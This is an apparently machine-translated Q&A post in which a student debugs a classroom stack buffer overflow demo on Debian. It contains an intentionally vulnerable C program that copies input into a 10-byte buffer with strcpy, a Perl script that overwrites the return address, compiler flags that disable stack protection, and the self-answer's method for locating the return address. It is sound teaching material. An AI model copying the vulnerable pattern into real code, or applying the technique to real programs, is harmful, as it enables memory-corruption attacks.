试验缓冲区溢出

Question

我最近采取了一个安全类，在其中我们简要介绍了缓冲区溢出问题。我对我们所涵盖的内容并不满意，所以我寻找了几个例子来跟随并尝试自己并发现Buffer Overflow Attack

我喜欢这个例子，因为它很容易理解并理解为什么一切正常。我试图遵循，但在Debian虚拟机而不是Windows。

这是从该网站的C代码：

#pragma check_stack(off) 

#include <string.h> 
#include <stdio.h> 

void foo(const char* input) 
{ 
    char buf[10]; 

    printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n% p\n\n"); 

    strcpy(buf, input); 
    printf("%s\n", buf); 

    printf("Now the stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n\n"); 
} 

void bar(void) 
{ 
    printf("Augh! I've been hacked!\n"); 
} 

int main(int argc, char* argv[]) 
{ 
    //Blatant cheating to make life easier on myself 
    printf("Address of foo = %p\n", foo); 
    printf("Address of bar = %p\n", bar); 

    if (argc != 2) 
    { 
     printf("Please supply a string as an argument!\n"); 
     return -1; 
    } 

    foo(argv[1]); 
    return 0; 
} 

代码“骗子”通过在两个函数foo和酒吧的地址。最终目标是让bar仅使用缓冲区溢出来运行。要做到这一点，他们做了简短的Perl脚本：

$arg = "ABCDEFGHIJKLMNOP"."\x50\x10\x40"; 
$cmd = "StackOverrun ".$arg; 
system($cmd); 

由于我使用Linux而不是Windows，并且因为我的bar函数的地址稍有不同，我做了几个简单的修正：

$arg = "ABCDEFGHIJKLMNOP"."\xf7\x05\x40"; 
$cmd = "./prog ".$arg; 
system($cmd); 

我认为它应该像在他们的例子中一样工作;运行Perl脚本并将填充文本提供给程序，然后运行新的返回地址以运行bar。但它不适合我。

这是运行我的Perl脚本输出：

Address of foo: 0x400596 
Address of bar: 0x4005f7 
The current stack: 
0x7fffe6b4abd8 
0x7faba670c7a0 
0x1d 
0x6 
0x7faba63b099a 
0x7fffe6b4ad00 

ABCDEFGHIJKLMNOPP� 
Stack after input: 
0x7ffc31998568 
0x7f9a7c6ed7a0 
0x7f9a7c421e50 
0xf70550504f4e4d4c 
0x7f9a7c39199a 
0x7ffc31998690 

在我的输出，显示持有任何填料文本的唯一地址是从最后一个地址三分，一个之前的退货地址。

我怀疑这个问题来自于使用gcc编译我的程序，但我不确定究竟是什么导致了它。这个问题也可能是Debian。以下是我编的程序：

gcc -z execstack -fno-stack-protector prog.c -o prog 

我的希望是，编译没有堆栈保护可以让我效法没有问题。

任何帮助将是伟大的，我完全卡住。实际上，我可以简单地切换到Windows，但是现在我真的很想知道为什么它不起作用以及如何解决它。

Answer 1

好的，所以我会在这里回答我自己的问题，以防万一任何在将来看到它的人都好奇。

基本上，问题源于没有打印足够的内存地址以获取堆栈的清晰图像。如果你跟着问题中的链接，你会发现打印6个堆栈的内存地址足够用于他们的系统，但这对我们来说还不够。我的朋友建议从这个不断变化的源代码：

printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n% p\n\n"); 

strcpy(buf, input); 
printf("%s\n", buf); 

printf("Now the stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n\n"); 

这样：

printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n\n"); 

strcpy(buf, input); 

printf("Buffer: %s\n", buf); 
printf("Address of Buffer: %p\n\n", buf); 
printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n\n"); 

这种变化做了两件事我们。首先，它将打印的地址数量增加到13.其次，它打印缓冲区开始的地址。第二部分很重要，因为它给了我们一个相对值，以便在给定的堆栈地址中查找。例如：

overflow@OVERFLOW:~/Overflow$ ./prog ZZZZZZ 
Address of foo = 0x400596 
Address of bar = 0x400601 
Current Stack: 
0x7fffffe6 
0x7f30b7f8a7a0 
0x19 
0x6 
0x7f30b7c2e99a 
0x4007c8 
0x7ffddab72653 
0x7f30b7f9cde0 
0x7f30b81b01a8 
0x7ffddab71250 
0x400672 
0x7ffddab71338 
0x200000000 

Buffer: ZZZZZZ 
Address of Buffer: 0x7ffddab71220 

Stack after Input: 
0x7fffffde 
0x7f30b7f8a7a0 
0x21 
0xc 
0x7f30b7c2e99a 
0x4007c8 
0x7ffddab72653 
0x5a5a5a5a5a5a 
0x7f30b81b01a8 
0x7ffddab71250 
0x400672 
0x7ffddab71338 
0x200000000 

在这个例子中我们可以看到Address of Buffer: 0x7ffddab71220。如果我们查看下面的堆栈地址，我们会发现一个非常相似的地址：0x7ffddab72653。我们可以将其视为缓冲区的起点，以便以下几个地址成为缓冲区的存储容器。事实上，在这个例子中，我将“ZZZZZZ”打印到缓冲区中，并且您可以在我们的起始点更改为0x5a5a5a5a5a5a后立即看到地址，您可能已经猜到它是十六进制的“ZZZZZZ”。

好极了，所以现在我们知道缓冲区实际开始的位置，但我们不知道哪个是返回地址。如果我们看一下的函数的地址：

Address of foo = 0x400596和Address of bar = 0x400601 我们可以找到一个类似的值，低于我们的缓冲区的起点的地方，在这种情况下：0x400672。

在这一点上，我们知道我们需要的全部内容：哪些内存地址存储缓冲区，我们要调用的函数的地址，最重要的是我们要覆盖的返回地址。到那时，它需要用perl脚本进行试验，在缓冲区中添加字符，直到获得所需的结果。